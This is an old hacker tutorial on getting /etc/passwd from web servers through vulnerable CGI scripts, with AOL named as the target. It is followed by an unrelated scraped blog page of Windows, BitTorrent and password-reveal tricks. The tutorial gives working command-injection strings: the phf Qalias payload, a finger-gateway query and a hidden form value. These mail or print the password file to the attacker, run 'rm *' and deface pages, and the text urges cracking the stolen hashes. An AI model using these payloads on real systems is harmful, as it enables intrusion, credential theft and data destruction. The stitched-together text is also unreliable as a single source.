I - Introduction
This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov
er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.
II - Hacking from your Web Browser
There are several techniques on what I call "Web Browser Hacking". Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t
hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.
a. Finger box hacking:
Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://
www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search
for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email
address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:
This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type ... Http://www.aol.com/cgi-bin/phf ... if the phf is operational and has not been rem
oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x:).
c. Dont take my cgi form:
This section will explain how to use somebody else's cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:
<html><body>
<h2>This is a form to go to Modify</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="hidden" name="myaddress" value="nobody@aol.com">
<input type="text" name="input">
<input type="submit" value="send">
</form>
</body></html>
This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.
system("/usr/lib/sendmail -t $myaddress < $tempfile")
Now lets set up your page:
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="hidden" name="myaddress"
value=" ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value=:"getpasswd">
</form>
The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.
d. Changing web pages from your browser:
This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section.... http://www.aol.com.... we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%2
0>>filename.html...... This string will allow you to write to the filename.html and add "some text and shit" be noted it has to be in html format. You can place text, pictures or whatever you like.
III - Conclusion
This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser... It may also inform the guru's and advanced hackers some bits of information of perl and cgi. In further reading check out my sec
ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting...... wake up!!! thus I conclude.....
Modify.
Showing posts with label Popular Hacks. Show all posts
Showing posts with label Popular Hacks. Show all posts
Wednesday, 25 January 2012
Tuesday, 17 January 2012
Top Tips to increase bittorent download Speed
The
latest file sharing protocol bittorrent has modified everything when
it comes to file sharing. It is a nice platform for downloading large
files. Sharing of files include movies, iso images and MP3 songs.
Bittorent is mainly famous for illegal file sharing .
The Bittorrent system can be slow at times due to heavy traffic. so let us tweak bittorrent sharing program a little bit.
There are a lot of different bittorrent clients that you can download. I think the best are BitCommet and uTorrent.
The Bittorrent system can be slow at times due to heavy traffic. so let us tweak bittorrent sharing program a little bit.
There are a lot of different bittorrent clients that you can download. I think the best are BitCommet and uTorrent.
Here is a few tips to speed up
uTorrent Client. Similar can be implemented on any other torrent
clients ,which you are using.
Step 1: Increase TCP connections
You need to increase the number of TCP
connections that are allowed at max.Windows XP Service Pack 2 came
with the number of allowed open connections to 10. This is to stop any
piece of spyware(in our case bittorent client even) from totally
taking over your internet connection. TCP connection allowed should be
50 for optimal performance. The best way to increase the maximum
number of connections is to apply patch that is available at www.lvllord.de. A nice way to fix
this is to download this patch .
The little tweak to the torrent client works
great in certain times. If you’re using uTorrent go to Options menu
then Preferences. In the Preferences go the Advanced Options. In the
advanced options change the net.max_halfopen connections to 80. In the
same section change the max half open tcp connections to 80. Once your
done click on OK and you are all set. This tweak will let the maximum
TCP connection available for the bittorrent client. Now start
downloading you’ll realize a little difference in the download speed.
Port forwarding technique is more effective than this.
A third point of interest is that some
“windows updates” revert your tweaked tcp connections back to 10. So
it’s wise to check this every now and then. You can check this by
going to (in windows xp) Start > Control Panel > Administrative Tools
> Event Viewer > System… Look for event 4226 (sort by event).
If there are a lot of daily occurrences it’s likely that the max amount of half-open tcp connections was set back to 10. Or you’re infected with some nasty spy ware…
If there are a lot of daily occurrences it’s likely that the max amount of half-open tcp connections was set back to 10. Or you’re infected with some nasty spy ware…
Step 2:Torrent Client Configuration
In order to apply these tips you must know your maximum up- and download speed. You can test your bandwidth over here (stop all download activity while testing).
In order to apply these tips you must know your maximum up- and download speed. You can test your bandwidth over here (stop all download activity while testing).
Settings 1-4 can be found in the options,
settings or preference tab of most torrent clients.
1. Maximum upload speed
Probably the most important setting there is.
Your connection is (sort of) like a pipeline, if you use you maximum
upload speed there’s not enough space left for the files you are
downloading. So you have to cap your upload speed.
Use the following formula to determine your
optimal upload speed…
80% of your maximum upload speed
so if your maximum upload speed is 40 kB/s,
the optimal upload rate is 32kB/s But keep seeding!
Multiple login in yahoo Without Using any Software
You can login with multiple id's on the same yahoo messenger without any
download or patch .
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2. Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo --->pager---->Test
3. On the right page , right-click and choose new Dword value .
4. Rename it as Plural.
5. Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2. Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo --->pager---->Test
3. On the right page , right-click and choose new Dword value .
4. Rename it as Plural.
5. Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
Increase the speed of your internet connection without a new modem
As more and more people get quick connections to the internet, such as
cable or ADSL, it becomes apparent to the user of a simple dial-up modem
that the World Wide Web can quickly turn into the World Wide Wait. Here a
trick that can help speed up your current modem without shelling out the
big bucks.
There is a setting located in your windows registry called the Maximum Transfer Unit (MTU). This determines the size of the packets of data sent between your and your server. In Windows 95, this setting is has a value of 1,500 bytes when the actual size of internet packets is 1,000 bytes. This can sometimes slow things down. To remedy the situation, simply follow these steps:
In the registry editor (Start > Run > regedit.exe), navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans.
There is a setting located in your windows registry called the Maximum Transfer Unit (MTU). This determines the size of the packets of data sent between your and your server. In Windows 95, this setting is has a value of 1,500 bytes when the actual size of internet packets is 1,000 bytes. This can sometimes slow things down. To remedy the situation, simply follow these steps:
In the registry editor (Start > Run > regedit.exe), navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans.
In the NetTrans folder you
should find another folder named "000x" in which x represents a fourth
digit. Right-click on the "000x" folder and select New and StringValue.
Rename the item that appears in the panel on the right side to MaxMTU,
then double-click it to bring up the Edit String box and give it a velue
of 1002.
Remember to keep playing with the MaxMTU value until you feel that your internet connection has greatly sped up. Some people report huge speed gains using this tricks, while others hardly notice a difference. In any case, it's definetly worth a try.
Remember to keep playing with the MaxMTU value until you feel that your internet connection has greatly sped up. Some people report huge speed gains using this tricks, while others hardly notice a difference. In any case, it's definetly worth a try.
Tuesday, 27 December 2011
Increase your broadband speed
A Simple Tweak (XP Pro only) which will increase your Broadband Speed.
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed
Make sure you Log on as Administrator, not as a user with Administrator privileges.
Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed
Reveal *****secret
Want to Reveal the Passwords Hidden Behind Asterisk (****) ?
Follow the steps given below-
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!
Note :- This trick may not be working with firefox.
Follow the steps given below-
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!
Note :- This trick may not be working with firefox.
Subscribe to:
Posts (Atom)